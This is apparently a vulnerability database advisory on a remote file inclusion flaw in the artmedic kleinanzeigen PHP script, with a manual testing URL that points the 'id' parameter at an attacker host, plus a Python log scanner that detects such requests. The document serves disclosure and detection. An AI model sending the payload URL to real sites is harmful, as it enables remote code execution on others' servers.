artmedic kleinanzeigen Arbitrary Code Execution

2004-07-18T03:08:28
ID OSVDB:8116
Type osvdb
Reporter Francisco Alisson (dominusvis@click21.com.br)
Modified 2004-07-18T03:08:28

Description

Vulnerability Description

artmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victim's system, resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/artmedic-kleinanzeigen-path/index.php?id=http://[attacker]
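Since no patch is listed, requests of the shape shown above can be looked for in web server access logs. The following is an added example, not part of the original advisory or the vendor's code: it flags requests to index.php whose id parameter carries a URL instead of a local value. The log format (common/combined), the install path and all addresses and hostnames in the sample are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A URL scheme at the start of the value means it names a remote resource.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)\s*:', re.I)

def is_remote_include_attempt(target, script="index.php", param="id"):
    """True if `target` asks `script` to use a URL as the `param` value."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + script):
        return False
    # parse_qs decodes once; decode a second time as a conservative check
    # for values that were percent-encoded twice.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            return True
    return False

def scan(lines):
    """Return (client_ip, request_target) for each suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_remote_include_attempt(m.group("target")):
            hits.append((line.split(" ", 1)[0], m.group("target")))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2004:03:10:01 +0000] "GET /kleinanzeigen/index.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jul/2004:03:11:42 +0000] "GET /kleinanzeigen/index.php?id=http://remote.example/x HTTP/1.0" 200 311',
    '198.51.100.7 - - [18/Jul/2004:03:11:50 +0000] "GET /kleinanzeigen/index.php?id=hTTp%3A%2F%2Fremote.example%2Fx HTTP/1.0" 200 311',
    '203.0.113.5 - - [18/Jul/2004:03:12:09 +0000] "GET /kleinanzeigen/index.php?id=%2568ttp%253A%252F%252Fremote.example HTTP/1.1" 200 0',
    '192.0.2.10 - - [18/Jul/2004:03:13:00 +0000] "GET /search.php?id=http://remote.example/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(ip, target)
```

The same predicate can back a request filter in front of the application; a legitimate id value for this script is not expected to begin with a URL scheme.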

References:

Vendor URL: http://www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php
Security Tracker: 1010740
Secunia Advisory ID: 12099
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0229.html
Keyword: Remote File Inclusion
ISS X-Force ID: 16518
ISS X-Force ID: 16741
CVE-2004-0624